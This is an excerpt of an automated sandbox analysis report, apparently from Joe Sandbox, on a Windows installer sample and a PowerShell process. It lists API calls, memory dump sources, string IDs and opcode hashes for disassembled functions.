                                                  • Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
                                                  • Opcode Fuzzy Hash: f2b323149ec226a123e0c5e2c8aae63610c2ed85707ada0f382aad29919fcb8b
                                                  • Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                    • Part of subcall function 00405FFC: CharNextW.USER32(?,?,00425750,?,00406070,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\87tBuE42ft.exe"), ref: 0040600A
                                                    • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                    • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                  • lstrlenW.KERNEL32(00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\87tBuE42ft.exe"), ref: 004060B2
                                                  • GetFileAttributesW.KERNEL32(00425750,00425750,00425750,00425750,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004060C2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: PWB
                                                  • API String ID: 3248276644-4275379341
                                                  • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                  • Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
                                                  • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                  • Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 004056AA
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004056FB
                                                    • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                  • Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
                                                  • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                  • Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,: Completed,?,00000000,004067C1,80000002), ref: 00406596
                                                  • RegCloseKey.ADVAPI32(?), ref: 004065A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: : Completed
                                                  • API String ID: 3356406503-2954849223
                                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
                                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405FA3
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405FB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-224404859
                                                  • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
                                                  • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
                                                  • CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                  • Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
                                                  • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                  • Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$4'^q$4'^q$4'^q$4'^q$4'^q$4Dl$4Dl$tL9k$tL9k$tL9k$tL9k$x.8k$x.8k$x.8k$-8k$-8k
                                                  • API String ID: 0-2634227532
                                                  • Opcode ID: 11445832ea2c45acbe9a7dd2fc4d189ca4e89cf8102ff48cd857e3b16227abd0
                                                  • Instruction ID: d6de945ee786d265538dc74dfe247c26529836feefc7ff9897f906314b284c62
                                                  • Opcode Fuzzy Hash: 11445832ea2c45acbe9a7dd2fc4d189ca4e89cf8102ff48cd857e3b16227abd0
                                                  • Instruction Fuzzy Hash: A5F23DB4A00258DFDB24DB68C951FEAFBB2AF85304F1084A9D549AB751CB31ED81CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TAp$TAp
                                                  • API String ID: 0-421376115
                                                  • Opcode ID: 6e39b4700628253cf709f1b3af8a51db752f693625c539ee3f933c26210cab78
                                                  • Instruction ID: 42c9f275511c36831ac725a5eb17bebd6b19290d32ea24098ba073ff1f6bfe00
                                                  • Opcode Fuzzy Hash: 6e39b4700628253cf709f1b3af8a51db752f693625c539ee3f933c26210cab78
                                                  • Instruction Fuzzy Hash: A7B18C71E10219CFDF10CFA9DA9179EBBF2BF88304F148129D815E7294EB34A846DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TAp$TAp
                                                  • API String ID: 0-421376115
                                                  • Opcode ID: f5dd270f5db6e134a0abfd43d1a6cbf91c3bddbe89bb6c16336efc9eb4740dbd
                                                  • Instruction ID: 9cd2eeae81597dc7cdc731f11bddfa472d3b68f65ae8dbaf6ed0dfd9e5b07bfc
                                                  • Opcode Fuzzy Hash: f5dd270f5db6e134a0abfd43d1a6cbf91c3bddbe89bb6c16336efc9eb4740dbd
                                                  • Instruction Fuzzy Hash: E4B1BF70E1022ADFDB10CFA8CA9179DBBF2AF48314F148129D815E7354EB74A846DF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$4'^q$4'^q$4'^q$tL9k$tL9k$x.8k$x.8k$-8k$-8k
                                                  • API String ID: 0-115925904
                                                  • Opcode ID: 8897d4430519e90182842278487494f1422e676692f8366b979ab852c5d163ec
                                                  • Instruction ID: fe4f100e40f176cc339cca1e45a0c7cb5a38e0c57f3da9c81edaadd1d4d1d3b0
                                                  • Opcode Fuzzy Hash: 8897d4430519e90182842278487494f1422e676692f8366b979ab852c5d163ec
                                                  • Instruction Fuzzy Hash: 91B260B4A00258DFCB24DB64CD51FDAFBB2AF89704F1084A9D4496B791CB35AD81CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$x.8k$-8k
                                                  • API String ID: 0-28315562
                                                  • Opcode ID: d3c478de62b9ef4e5d8bcfde598912a5ae98889df1a9fea993098f7baae85923
                                                  • Instruction ID: bd0f6e14a6cbfc53de4814bd90601a58958f726cdb43733a15d1624f55b46803
                                                  • Opcode Fuzzy Hash: d3c478de62b9ef4e5d8bcfde598912a5ae98889df1a9fea993098f7baae85923
                                                  • Instruction Fuzzy Hash: DB92A4B4A00215DFD724DB68C951FAEFBB2AF85300F1084A9D909AB755CB31ED45CFA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$4'^q$tL9k$x.8k$-8k
                                                  • API String ID: 0-1401698824
                                                  • Opcode ID: 72a630a0ee85d0f24fb7ef501571b3ba7a1822943f878e407d02e67b91ff4a03
                                                  • Instruction ID: e1d6c75627f8bcf29c803ba67f8da39ef1730a101301fe29a025793a8cb1d2a1
                                                  • Opcode Fuzzy Hash: 72a630a0ee85d0f24fb7ef501571b3ba7a1822943f878e407d02e67b91ff4a03
                                                  • Instruction Fuzzy Hash: E67281B4A00255DFD724DB58CD51FAEFBB2AB85300F1085A9D95AAB740CB31ED818FA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$4'^q$x.8k$-8k
                                                  • API String ID: 0-2108572539
                                                  • Opcode ID: 4e4181e348e34e3954206527fe1b718d5b092d8a432f62a364cce53f3f93fb12
                                                  • Instruction ID: f7d71ec6200e59d5860152a4eea766a5b78bacc1dddeb9dabbefc99497137aad
                                                  • Opcode Fuzzy Hash: 4e4181e348e34e3954206527fe1b718d5b092d8a432f62a364cce53f3f93fb12
                                                  • Instruction Fuzzy Hash: C0627BB4A00215DFDB24DB58C951FAAFBB2BF85304F1085A9D85A6B750CB31ED81CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$4'^q$x.8k$-8k
                                                  • API String ID: 0-4069266804
                                                  • Opcode ID: 2ae2634aeabe191b96227ab845e7ea0d7663fc167dff4e44b71e786a47759fb9
                                                  • Instruction ID: c53f161c391271b9162b9d2f2bae4ff9c62d7a143867d073a0df6eaa66b6fa0f
                                                  • Opcode Fuzzy Hash: 2ae2634aeabe191b96227ab845e7ea0d7663fc167dff4e44b71e786a47759fb9
                                                  • Instruction Fuzzy Hash: B1327EB4A00214DFD724DB68C951FAEFBB2BB85304F5084A9D95A6B750CB31ED81CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$(fGl$4'^q$x.8k$-8k
                                                  • API String ID: 0-4069266804
                                                  • Opcode ID: 73dc3b7838b9168fc82bf67ceea05381ad0c3dc43403cd7e28f2b2b06ab0a54e
                                                  • Instruction ID: bd80ccb227b21f6e922ad1da71811f5c89e5bec59fae88a069dc670c916f4fee
                                                  • Opcode Fuzzy Hash: 73dc3b7838b9168fc82bf67ceea05381ad0c3dc43403cd7e28f2b2b06ab0a54e
                                                  • Instruction Fuzzy Hash: 2D3260B4A00258DFCB24DB64C951FDAF7B2AF89304F1084A9D55A6B791CB31ED81CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl$(fGl$4'^q$4Dl$tL9k$x.8k
                                                  • API String ID: 0-493460371
                                                  • Opcode ID: 557325d9627eca3f3ff8dd90a30383e7689774511bef45af12ce5fefebffcc0d
                                                  • Instruction ID: be4116a5514cb79cb603770ff86f327296a4afe6947b634cda649c6469f45ff2
                                                  • Opcode Fuzzy Hash: 557325d9627eca3f3ff8dd90a30383e7689774511bef45af12ce5fefebffcc0d
                                                  • Instruction Fuzzy Hash: 93122AB4A14259DFDB70DB28C951FE9F7B2AB45300F1084AAD54AAB390DB31ED81CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl$(fGl$4'^q$4Dl$tL9k$x.8k
                                                  • API String ID: 0-493460371
                                                  • Opcode ID: d7cb457ff27fbc32e207b6c47b810458834b55ed55ed37a096da19dd1823f57f
                                                  • Instruction ID: 595dd3bc45c2c06095ac074db07534a641f975492a73852dc47af8b72cb9549f
                                                  • Opcode Fuzzy Hash: d7cb457ff27fbc32e207b6c47b810458834b55ed55ed37a096da19dd1823f57f
                                                  • Instruction Fuzzy Hash: 56122AB4A10259DFDB70DB28C951FEAF7B2AB45300F1084AAD54AAB350DB31ED81CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$4'^q$4'^q$4'^q$4'^q$x.8k$-8k
                                                  • API String ID: 0-308021120
                                                  • Opcode ID: cf17db84ee5306563faf055efa760d526415f78bcefacbbfdf7d0b5034886628
                                                  • Instruction ID: b9155cabac84b4f35ed7b2fc216c22d706dc6e51b912605df243a7b0a2e03678
                                                  • Opcode Fuzzy Hash: cf17db84ee5306563faf055efa760d526415f78bcefacbbfdf7d0b5034886628
                                                  • Instruction Fuzzy Hash: 58E17BB4B002099FC724DB68D955FAEFBB2AB89304F10C429D8026F365CB75EC45CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                  • API String ID: 0-3272787073
                                                  • Opcode ID: 10915421ec4e6b72d2d956660f7fd5b9d7eafaf18a12d0a178a853c4757e1dec
                                                  • Instruction ID: 1c2668b6582b03cb4071814ec094217da6efc06c63f7557975abb09ddb14b2d1
                                                  • Opcode Fuzzy Hash: 10915421ec4e6b72d2d956660f7fd5b9d7eafaf18a12d0a178a853c4757e1dec
                                                  • Instruction Fuzzy Hash: 5C1247B1B042069FCB259B69D450B6AFBE6EFC6210F28C4AAD445CF351DB32CC45CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$4'^q$4'^q$x.8k$-8k
                                                  • API String ID: 0-2718122964
                                                  • Opcode ID: ce85dc0d09ef2c880e1ee7b06c38b038ae9948336aed9f39cf907b4fc90074c8
                                                  • Instruction ID: c004f24a16cd4755641f31515973a904a2af9e52b908d13fa352fba85293a798
                                                  • Opcode Fuzzy Hash: ce85dc0d09ef2c880e1ee7b06c38b038ae9948336aed9f39cf907b4fc90074c8
                                                  • Instruction Fuzzy Hash: 8AC1CEB4A002059FC724DB68D954FAEFBB2AF89304F14C069D8066F3A5CB75EC45CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hbq$$^q$$^q
                                                  • API String ID: 0-1611274095
                                                  • Opcode ID: bd4a5793f97965476f01812522959a9a3f2b1fa9d7d25332d9404ed065c1d509
                                                  • Instruction ID: 0cec602b038b438a09cf0010063fd957d4675285c2ef6fe373ee06538ade54c5
                                                  • Opcode Fuzzy Hash: bd4a5793f97965476f01812522959a9a3f2b1fa9d7d25332d9404ed065c1d509
                                                  • Instruction Fuzzy Hash: F2227234B002648FCB25DF24D9546AEB7B2BF89305F1544A9D40AAB361DF35EE86CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl
                                                  • API String ID: 0-3516880073
                                                  • Opcode ID: a3c63b41e53604ebe89ea47c4a3829948a90bf5433c163ff5cf030095965c902
                                                  • Instruction ID: c2cd7cbd9f59eeb9d3d7157a22d5830512439056b930ac578ef568e778ba2a5f
                                                  • Opcode Fuzzy Hash: a3c63b41e53604ebe89ea47c4a3829948a90bf5433c163ff5cf030095965c902
                                                  • Instruction Fuzzy Hash: 4C126CB4B00209DFDB14DB98D951EAAFBB2EF89314F26C069D8059B755CB32EC41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl
